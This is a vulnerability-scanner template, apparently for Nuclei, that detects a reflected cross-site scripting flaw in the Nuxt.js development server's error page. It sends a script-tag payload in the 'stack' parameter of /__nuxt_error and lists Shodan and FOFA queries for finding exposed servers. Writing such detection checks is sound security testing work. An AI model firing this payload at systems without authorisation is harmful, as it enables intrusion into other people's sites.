id: nuxt-js-xss

info:
  name: Error Page XSS - Nuxt.js
  author: DhiyaneshDK
  severity: medium
  description: |
    The developer server unsafely renders the stack trace within errors. This can be manipulated by sending a specially crafted request.
  reference:
    - https://huntr.dev/bounties/70ac720d-c932-4ed3-98b1-dd2cbcb90185/
    - https://bryces.io/blog/nuxt3
    - https://twitter.com/fofabot/status/1669339995780558849
  metadata:
    verified: "true"
    max-request: 1
    shodan-query: html:"buildAssetsDir" "nuxt"
    fofa-query: body="buildAssetsDir" && body="__nuxt"
  tags: huntr,xss,nuxtjs,error

http:
  - method: GET
    path:
      - "{{BaseURL}}/__nuxt_error?stack=%0A<script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "window.__NUXT__"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

# digest: 4a0a00473045022100858932f971761dbf5f90cae1f6fd762587bc8db062bc348a0e75e6919d1c1ed502207f3e15e50de570269cc2d415aea273f1abb2440e270d272e572e7081f2a59402:922c64590222798bb761d5b6d8e72950